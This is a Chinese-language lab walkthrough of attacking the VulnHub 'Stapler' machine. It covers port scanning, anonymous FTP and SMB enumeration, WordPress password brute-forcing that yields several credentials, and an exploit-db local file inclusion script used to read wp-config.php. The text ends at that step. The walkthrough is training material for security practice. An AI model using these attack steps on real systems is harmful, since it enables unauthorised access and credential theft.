vulnhub 靶机渗透:Stapler

Stapler

    • nmap扫描
    • 21 端口
    • 22 53端口
    • 80端口
      • 目录爆破
    • 139端口
    • 666 端口
    • 3306端口
    • 12380端口
    • 获取数据库root权限
    • 获取系统立足点
    • 提权
  • 其他思路
    • 系统立足点1
    • 系统立足点2
    • 提权1
    • 提权2

https://www.vulnhub.com/entry/stapler-1,150/
靶机ip:192.168.54.27
kali ip:192.168.54.128

nmap扫描

# Nmap 7.93 scan initiated Sun May 28 17:41:37 2023 as: nmap --min-rate 20000 -p- -oN nmap/ports 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00026s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)

# Nmap done at Sun May 28 17:41:44 2023 -- 1 IP address (1 host up) scanned in 7.02 second
# Nmap 7.93 scan initiated Sun May 28 17:43:35 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.0050s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   closed doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)

# Nmap done at Sun May 28 17:43:51 2023 -- 1 IP address (1 host up) scanned in 16.06 seconds
# yunki @ yunki in ~/oscp/7.Stapler1 [9:30:42] 
$ cat nmap/udp     
# Nmap 7.93 scan initiated Sun May 28 17:43:59 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.27
Warning: 192.168.54.27 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.27
Host is up (0.039s latency).
Not shown: 65488 open|filtered udp ports (no-response), 44 closed udp ports (port-unreach)
PORT      STATE SERVICE
53/udp    open  domain
137/udp   open  netbios-ns
59771/udp open  unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)

# Nmap done at Sun May 28 17:44:40 2023 -- 1 IP address (1 host up) scanned in 40.42 seconds
$ cat nmap/ports | grep 'open' | awk -F '/' '{print $1}' | tr '\n' ','
21,22,53,80,139,666,3306,12380,%     
# Nmap 7.93 scan initiated Sun May 28 17:43:17 2023 as: nmap -sT -sC -sV -O -p21,22,53,80,139,666,3306,12380 -oN nmap/details 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00043s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8121cea11a05b1694f4ded8028e89905 (RSA)
|   256 5ba5bb67911a51c2d321dac0caf0db9e (ECDSA)
|_  256 6d01b773acb0936ffab989e6ae3cabd3 (ED25519)
53/tcp    open  domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open  http        PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open  doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open  mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, InteractiveClient, IgnoreSigpipes, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \x01\x1E>b p\x19:C\x05\x0CI`|1>\x0F\x0Fxp
|_  Auth Plugin Name: mysql_native_password
12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:A7:37:64 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2023-05-28T18:41:52+01:00
|_clock-skew: mean: 7h38m18s, deviation: 34m37s, median: 7h58m17s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-28T17:41:52
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 28 17:44:14 2023 -- 1 IP address (1 host up) scanned in 57.29 seconds
# Nmap 7.93 scan initiated Sun May 28 17:44:58 2023 as: nmap --script=vuln -p21,22,53,80,139,666,3306,12380 -oN nmap/vuln 192.168.54.27
Nmap scan report for 192.168.54.27
Host is up (0.00044s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp   open  netbios-ssn
666/tcp   open  doom
3306/tcp  open  mysql
12380/tcp open  unknown
MAC Address: 00:0C:29:A7:37:64 (VMware)

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

# Nmap done at Sun May 28 17:53:39 2023 -- 1 IP address (1 host up) scanned in 521.66 seconds

21 端口

根据nmap/details可以知道21端口运行 vsftpd 2.0.8 or later服务。

# yunki @ yunki in ~/oscp/7.Stapler1 [9:32:31] 
$ mkdir 21      

# yunki @ yunki in ~/oscp/7.Stapler1 [9:32:34] 
$ cd 21        

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:35] 
$ ftp 192.168.54.27
Connected to 192.168.54.27.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.54.27:yunki): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> prompt
Interactive mode off.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.06 secs (1.7169 kB/s)
ftp> bye
221 Goodbye.

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:58] 
$ ls
note

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:32:59] 
$ cat note       
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

获取到一段文字,其中有两个用户,放到字典里。

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:35:29] 
$ echo "elly\njohn" >> ../names.list

# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:35:48] 
$ cat ../names.list 
elly
john
# yunki @ yunki in ~/oscp/7.Stapler1/21 [9:36:36] 
$ searchsploit vsftpd 2.0  
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                            | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                            | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                            | windows/dos/31819.pl
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

再使用searchsploit扫描一下,发现三个只能在dos下使用的脚本,pass,下一个端口。

22 53端口

22端口运行ssh服务,信息收集顺序靠后,
53端口运行dnsmasq 2.75服务,不太熟悉,没有突破口再回来看这个是否有信息。

80端口

目录爆破

# yunki @ yunki in ~/oscp/7.Stapler1/80 [9:51:21] 
$ dirsearch -u 192.168.54.27                    

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                                     
                                                                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/yunki/.dirsearch/reports/192.168.54.27_23-05-29_09-51-27.txt

Error Log: /home/yunki/.dirsearch/logs/errors-23-05-29_09-51-27.log

Target: http://192.168.54.27/

[09:51:27] Starting: 
[09:51:28] 200 -  220B  - /.bash_logout                                    
[09:51:28] 200 -    4KB - /.bashrc                                         
[09:51:31] 200 -  675B  - /.profile                                        
                                                                             
Task Completed 

都下载下来看看,没有什么敏感信息。

139端口

samba服务

# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:55:28] C:1
$ smbclient -L 192.168.54.27     
Password for [WORKGROUP\yunki]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:55:46] 
$ smbclient //192.168.54.27/kathy
Password for [WORKGROUP\yunki]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun  4 00:52:52 2016
  ..                                  D        0  Tue Jun  7 05:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016
  backup                              D        0  Sun Jun  5 23:04:14 2016

                19478204 blocks of size 1024. 16389168 blocks available
smb: \> prompt
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 23:02:27 2016
  ..                                  D        0  Sat Jun  4 00:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 23:02:27 2016

                19478204 blocks of size 1024. 16389168 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (12.5 KiloBytes/sec) (average 12.5 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> ls
  .                                   D        0  Sat Jun  4 00:52:52 2016
  ..                                  D        0  Tue Jun  7 05:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016
  backup                              D        0  Sun Jun  5 23:04:14 2016

                19478204 blocks of size 1024. 16389168 blocks available
smb: \> cd backup
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 23:04:14 2016
  ..                                  D        0  Sat Jun  4 00:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 23:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Tue Apr 28 01:14:46 2015

                19478204 blocks of size 1024. 16389168 blocks available
smb: \backup\> get vsftpd.conf 
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (1940.4 KiloBytes/sec) (average 735.5 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz 
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (41713.5 KiloBytes/sec) (average 39612.1 KiloBytes/sec)
smb: \backup\> cd ..
smb: \> ls
  .                                   D        0  Sat Jun  4 00:52:52 2016
  ..                                  D        0  Tue Jun  7 05:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 23:02:27 2016
  backup                              D        0  Sun Jun  5 23:04:14 2016

                19478204 blocks of size 1024. 16389168 blocks available
smb: \> exit

# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:56:34] 
$ smbclient //192.168.54.27/tmp  
Password for [WORKGROUP\yunki]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May 29 01:49:49 2023
  ..                                  D        0  Tue Jun  7 05:39:56 2016
  ls                                  N      274  Sun Jun  5 23:32:58 2016

                19478204 blocks of size 1024. 16389168 blocks available
smb: \> get ls
getting file \ls of size 274 as ls (89.2 KiloBytes/sec) (average 89.2 KiloBytes/sec)
smb: \> exit

# yunki @ yunki in ~/oscp/7.Stapler1/139 [9:56:45] 
$ ls
ls  todo-list.txt  vsftpd.conf  wordpress-4.tar.gz

一共有两个共享文件夹,kathy和tmp,都下载下来。

666 端口

根据details文件,发现666端口会返回一些东西,看到有个jpe,可能是个图片。用nc去接收一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [10:04:23] 
$ cd 666                         

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:07:55] 
$ nc 192.168.54.27 666 >> file   

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:02] 
$ file file        
file: Zip archive data, at least v2.0 to extract, compression method=deflate

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:08] 
$ mv file file.zip 

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:23] 
$ unzip file.zip
Archive:  file.zip
  inflating: message2.jpg            

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:29] 
$ ls
file.zip  message2.jpg

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:31] 
$ xdg-open message2.jpg

vulnhub 靶机渗透:Stapler_第1张图片
发现个用户,写入到names.list中。

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:08:36] 
$ cat ../names.list 
elly
john

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:09:55] 
$ echo "scott" >> ../names.list 

# yunki @ yunki in ~/oscp/7.Stapler1/666 [10:10:22] 
$ cat ../names.list
elly
john
scott

3306端口

一样,优先级靠后

12380端口

发现也是个http服务,看看主页。
发现输入扫描目录都是该页面,例如/robots.txt等。右键查看源代码。发现注释。
![在这里插入图片描述](https://img-blog.csdnimg.cn/da5519cf116d4c049bda6984549508b4.png

# yunki @ yunki in ~/oscp/7.Stapler1 [10:21:15] 
$ echo 'zoe' >> names.list                         

# yunki @ yunki in ~/oscp/7.Stapler1 [10:21:21] 
$ cat names.list  
elly
john
scott
zoe

同样爆破一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [10:16:52] 
$ dirsearch -u 192.168.54.27:12380
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                                     
                                                                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/yunki/.dirsearch/reports/192.168.54.27-12380_23-05-29_10-17-44.txt

Error Log: /home/yunki/.dirsearch/logs/errors-23-05-29_10-17-44.log

Target: http://192.168.54.27:12380/

[10:17:44] Starting: 

爆破的同时,继续信息收集,抓包看看。
vulnhub 靶机渗透:Stapler_第2张图片
发现是400 bad request,那可能是请求头错误,协议有问题。换成https试一试。
vulnhub 靶机渗透:Stapler_第3张图片
https爆破一下

# yunki @ yunki in ~/oscp/7.Stapler1 [10:31:18] 
$ dirsearch -u https://192.168.54.27:12380/                   
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/yunki/.dirsearch/reports/192.168.54.27-12380/-_23-05-29_10-31-27.txt

Error Log: /home/yunki/.dirsearch/logs/errors-23-05-29_10-31-27.log

Target: https://192.168.54.27:12380/

[10:31:28] Starting: 
[10:31:30] 403 -  302B  - /.ht_wsr.txt                                     
[10:31:30] 403 -  305B  - /.htaccess.bak1
[10:31:30] 403 -  305B  - /.htaccess.orig
[10:31:30] 403 -  307B  - /.htaccess.sample
[10:31:30] 403 -  305B  - /.htaccess_orig
[10:31:30] 403 -  304B  - /.htaccessOLD2
[10:31:30] 403 -  306B  - /.htaccess_extra
[10:31:30] 403 -  303B  - /.htaccess_sc
[10:31:30] 403 -  303B  - /.htaccessBAK
[10:31:30] 403 -  303B  - /.htaccessOLD
[10:31:30] 403 -  295B  - /.htm
[10:31:30] 403 -  302B  - /.httr-oauth
[10:31:30] 403 -  301B  - /.htpasswds
[10:31:30] 403 -  305B  - /.htpasswd_test
[10:31:30] 403 -  305B  - /.htaccess.save
[10:31:30] 403 -  296B  - /.html                                           
[10:31:31] 403 -  295B  - /.php                                            
[10:31:31] 403 -  296B  - /.php3                                           
[10:31:57] 200 -   21B  - /index.html                                       
[10:31:58] 301 -  329B  - /javascript  ->  https://192.168.54.27:12380/javascript/
[10:32:05] 200 -   13KB - /phpmyadmin/doc/html/index.html                   
[10:32:06] 301 -  329B  - /phpmyadmin  ->  https://192.168.54.27:12380/phpmyadmin/
[10:32:07] 200 -   10KB - /phpmyadmin/                                      
[10:32:07] 200 -   10KB - /phpmyadmin/index.php                             
[10:32:10] 200 -   59B  - /robots.txt                                       
[10:32:11] 403 -  304B  - /server-status                                    
[10:32:11] 403 -  305B  - /server-status/                                   
                                                                             
Task Completed                 

发现路径。访问!
vulnhub 靶机渗透:Stapler_第4张图片

vulnhub 靶机渗透:Stapler_第5张图片
vulnhub 靶机渗透:Stapler_第6张图片
发现是个wordpress服务??wpscan扫描!

# yunki @ yunki in ~/oscp/7.Stapler1 [11:04:01] C:2
$ wpscan --url https://192.168.54.27:12380/blogblog/  --disable-tls-checks -P /usr/share/wordlists/rockyou.txt                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://192.168.54.27:12380/blogblog/ [192.168.54.27]
[+] Started: Mon May 29 11:04:07 2023

Interesting Finding(s):
....
skips
....

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc Multicall against 11 user/s
[SUCCESS] - garry / football                                                                                                                                                
[SUCCESS] - harry / monkey                                                                                                                                                  
[SUCCESS] - scott / cookie                                                                                                                                                  
[SUCCESS] - kathy / coolgirl 

爆破出用户,拿去ssh登录发现都不对。那就后台登录,可以登录但没有什么可以利用的。那就搜索一下wp使用的插件,看看有没有漏洞。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:12:21] C:1
$ wpscan --url https://192.168.54.27:12380/blogblog/  --disable-tls-checks -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://192.168.54.27:12380/blogblog/ [192.168.54.27]
[+] Started: Mon May 29 11:12:40 2023

Interesting Finding(s):
...
...
skips
...
...

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:03:43 <======================================================================================> (103211 / 103211) 100.00% Time: 00:03:43
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 5.1
 | Last Updated: 2023-04-05T10:17:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.8.0
 | Last Updated: 2023-03-27T09:14:00.000Z
 | Readme: https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://192.168.54.27:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon May 29 11:16:49 2023
[+] Requests Done: 103263
[+] Cached Requests: 13
[+] Data Sent: 30.578 MB
[+] Data Received: 13.971 MB
[+] Memory used: 529.801 MB
[+] Elapsed time: 00:04:08

发现使用了好多插件,用searchsploit搜索一下。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:26] 
$ searchsploit advanced video    
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                | php/webapps/39646.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:33] 
$ searchsploit -m 39646      
  Exploit: WordPress Plugin Advanced Video 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/39646
     Path: /usr/share/exploitdb/exploits/php/webapps/39646.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/oscp/7.Stapler1/39646.py



# yunki @ yunki in ~/oscp/7.Stapler1 [11:18:42] 
$ vim 39646.py     

修改如下信息。
vulnhub 靶机渗透:Stapler_第7张图片
运行文件,发现报错

# yunki @ yunki in ~/oscp/7.Stapler1 [11:20:36] 
$ python 39646.py 
Traceback (most recent call last):
  File "39646.py", line 41, in <module>
    objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 429, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 447, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1248, in https_open
    context=self._context)
  File "/usr/lib/python2.7/urllib2.py", line 1205, in do_open
    raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:733)>

可能是ssl问题,加入代码。

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

重新运行。

# yunki @ yunki in ~/oscp/7.Stapler1 [11:22:48] 
$ python 39646.py 

在uploads文件夹里发现刚才执行生成的文件。
vulnhub 靶机渗透:Stapler_第8张图片

